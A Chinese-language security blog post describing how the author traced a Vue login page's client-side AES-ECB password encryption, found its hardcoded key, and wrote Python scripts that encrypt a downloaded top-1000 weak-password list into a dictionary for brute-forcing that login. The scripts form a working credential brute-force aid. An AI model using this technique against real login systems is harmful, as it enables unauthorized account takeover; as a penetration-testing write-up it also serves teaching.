Posted Updated web security4 minutes read (About 531 words)

记一次简单的寻找前端加密爆破的逻辑过程

过程比较简单,属于一篇水文。主要参考这篇文章中的第三种方法。

前端使用vue写的,把前端代码复制出来
Alt text

找到登陆那点的触发函数
Alt text

找到提交函数中密码变量
Alt text

全局搜索即可定位到加密逻辑,并且找到加密用的密钥
Alt text

通过注释可以发现是AES加密
Alt text

查看代码变量可以看出是AES-ECB

1
2
3
4
5
6
7
const encrypt=(word, keyStr)=>{
    keyStr = keyStr ? keyStr : 'abcdefgabcdefg12';
    let key  = CryptoJS.enc.Utf8.parse(keyStr);//Latin1 w8m31+Yy/Nw6thPsMpO5fg==
    let srcs = CryptoJS.enc.Utf8.parse(word);
    let encrypted = CryptoJS.AES.encrypt(srcs, key, {mode:CryptoJS.mode.ECB,padding: CryptoJS.pad.Pkcs7});
    return encrypted.toString();
  };

从网上找个python版的AES-ECB脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
from Crypto.Cipher import AES
import os
from Crypto import Random
import base64

class AESUtil:

    __BLOCK_SIZE_16 = BLOCK_SIZE_16 = AES.block_size

    @staticmethod
    def encryt(str, key):
        cipher = AES.new(key, AES.MODE_ECB)
        x = AESUtil.__BLOCK_SIZE_16 - (len(str) % AESUtil.__BLOCK_SIZE_16)
        if x != 0:
            str = str + chr(x)*x
        msg = cipher.encrypt(str)
        msg = base64.urlsafe_b64encode(msg).replace('=', '')
        return msg

    @staticmethod
    def decrypt(enStr, key):
        cipher = AES.new(key, AES.MODE_ECB)
        enStr += (len(enStr) % 4)*"="
        decryptByts = base64.urlsafe_b64decode(enStr)
        msg = cipher.decrypt(decryptByts)
        paddingLen = ord(msg[len(msg)-1])
        return msg[0:-paddingLen]

if __name__ == "__main__":
    key = "G20PAA&9-EEFPQ5T"
    print AESUtil.encryt("123456", key)

将跑出来的脚本和提交的对比,发现提交的有padding。
Alt text
Alt text

稍微修改一下代码逻辑,从github上下弱口令字典生成加密字典

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
import requests
from Crypto.Cipher import AES
import os
from Crypto import Random
import base64

class AESUtil:

    __BLOCK_SIZE_16 = BLOCK_SIZE_16 = AES.block_size

    @staticmethod
    def encryt(str, key):
        cipher = AES.new(key, AES.MODE_ECB)
        x = AESUtil.__BLOCK_SIZE_16 - (len(str) % AESUtil.__BLOCK_SIZE_16)
        if x != 0:
            str = str + chr(x)*x
        msg = cipher.encrypt(str)
        msg = base64.urlsafe_b64encode(msg)
        return msg

    @staticmethod
    def decrypt(enStr, key):
        cipher = AES.new(key, AES.MODE_ECB)
        enStr += (len(enStr) % 4)*"="
        decryptByts = base64.urlsafe_b64decode(enStr)
        msg = cipher.decrypt(decryptByts)
        paddingLen = ord(msg[len(msg)-1])
        return msg[0:-paddingLen]

if __name__ == "__main__":
    resp = requests.get(url="https://raw.githubusercontent.com/TheKingOfDuck/fuzzDicts/master/passwordDict/top1000.txt")
    passwd_list = resp.content.split('\n')
    key = "G20PAA&9-EEFPQ5T"
    with open('./top1000en.txt', 'a+') as f:
        for i in passwd_list:
            f.write(AESUtil.encryt(i, key) + '\n')
    print AESUtil.encryt("123456", key)

记一次简单的寻找前端加密爆破的逻辑过程

https://cl0und.github.io/2019/11/08/记一次简单的寻找前端加密爆破的逻辑过程/

Author

李三(cl0und)

Posted on

2019-11-08

Updated on

2020-07-11

Licensed under

#
Follow

Categories

Recents

Archives

Tags

binary1
chrome1
cobaltstrike2
ctf2
ebpf1
economics1
java21
js1
kerberos1
paper reading2
php6
pwn1
python2
redteam2
sql1
ssrf1
stock1
web cache2
windows1
xss2
2
×